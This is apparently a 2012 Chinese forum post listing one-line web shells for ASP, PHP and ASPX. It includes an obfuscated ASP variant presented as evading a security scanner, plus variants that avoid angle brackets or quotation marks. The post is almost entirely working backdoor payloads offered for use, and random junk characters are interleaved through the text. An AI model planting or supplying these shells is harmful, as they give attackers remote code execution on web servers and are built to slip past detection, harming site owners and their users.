asp一句话 <%execute(request("1"))%> : @% n' l! B4 r1 E, Z& u
: C7 r, D w3 T/ T/ x) M" @5 Sphp一句话 <?php eval($_POST[1]);?> / F/ `! X9 _/ ~0 c
0 a0 l3 ]! G4 ^- Q! g- z6 J
aspx一句话1 x2 F: r R/ f& X% @# L
0 y E/ `, ]+ u/ G
<script language="C#" runat="server">' i' v4 [: Q. p( f
8 U! P' F" p" s8 l* o8 `+ TWebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");
% }; z, l. U6 `& C8 A' \* F# [/ g% I& y0 n
</script>
, C" D! h4 b$ @8 h9 f, G) \& h0 K3 |; W e1 O2 O9 E
可以躲过雷客图的一句话。
) V6 {+ u4 L; |/ o
3 |$ T3 z; ]$ e. ~7 n8 c" [6 l <%
- ^& G5 R/ r8 f. O/ N+ f7 ~% N4 [" i9 S9 F; G3 q
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
$ P5 z l1 q* P0 H. b' r# K. h f0 U* P# _2 w/ h9 {
ms.Language="VBScript"
+ s( T. @6 X2 M8 p9 R
; O1 ]4 \1 A/ |" Q0 f ms.AddObject "Response", Response% P/ c% }& o5 B; R0 X) B
0 C8 I# Y- q7 m$ L1 O' x ms.AddObject "request", request
/ @3 ?6 a8 L9 B2 l6 U7 L9 [
3 d( q" F; w; z4 Y ms.ExecuteStatement("ev"&"al(request(""1""))")
U/ S: M( [9 O' B: K
6 w/ `: d c5 q v) g. A0 v" @1 |$ y %>6 V! h o5 _3 W0 u( N/ K
( g/ u' W/ [9 q3 @' P
不用'<,>'的asp一句话
8 t Z' F- {" B; S, T _/ n) J; H* e1 |6 A3 [
<script language=VBScript runat=server>execute request("1")</script>
: A+ E' l: u7 l. E7 }5 m! A3 x8 i4 d; ]6 [3 `2 x& M4 p% a4 t
不用双引号的一句话。
: V9 j5 Y x# y3 I
$ d) C" e" i) J$ s H. Y8 e: H <%eval request(chr(35))%>
: J ?8 \6 C. c# [" D' ~: R |
发表于 2012-9-23 14:36:09
收藏
支持
反对